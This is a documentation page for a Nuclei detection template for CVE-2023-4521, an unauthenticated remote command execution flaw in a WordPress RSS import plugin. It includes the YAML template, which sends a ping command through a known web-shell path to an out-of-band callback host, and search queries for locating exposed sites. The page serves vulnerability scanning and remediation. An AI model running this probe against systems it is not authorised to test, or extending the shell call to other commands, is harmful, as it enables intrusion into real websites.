Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
ID: CVE-2023-4521
Severity: critical
Author: princechaddha
Tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency
Description
Section titled “Description”The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
YAML Source
Section titled “YAML Source”id: CVE-2023-4521
info: name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE author: princechaddha severity: critical description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell. impact: | Allows unauthenticated attackers to execute arbitrary code on the target system. remediation: | Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4521 epss-score: 0.03055 epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: mooveagency product: "import_xml_and_rss_feeds" framework: wordpress shodan-query: "http.html:\"import-xml-feed\"" fofa-query: "body=\"import-xml-feed\"" tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagencyflow: http(1) && http(2)
http: - raw: - | GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 Host: {{Hostname}}
matchers: - type: word internal: true words: - 'Import XML and RSS Feeds'
- method: GET path: - "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
matchers: - type: word part: interactsh_protocol words: - "dns"# digest: 4a0a00473045022100f66fc2e8711155da97ff664d9c3d6ae2626e6d15e39e5cb7dfd4a7041e208eab022020477b4c157d42317989cca2691cebdca6e33186d028651c0e8ad95c18c33a47:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4521.yaml"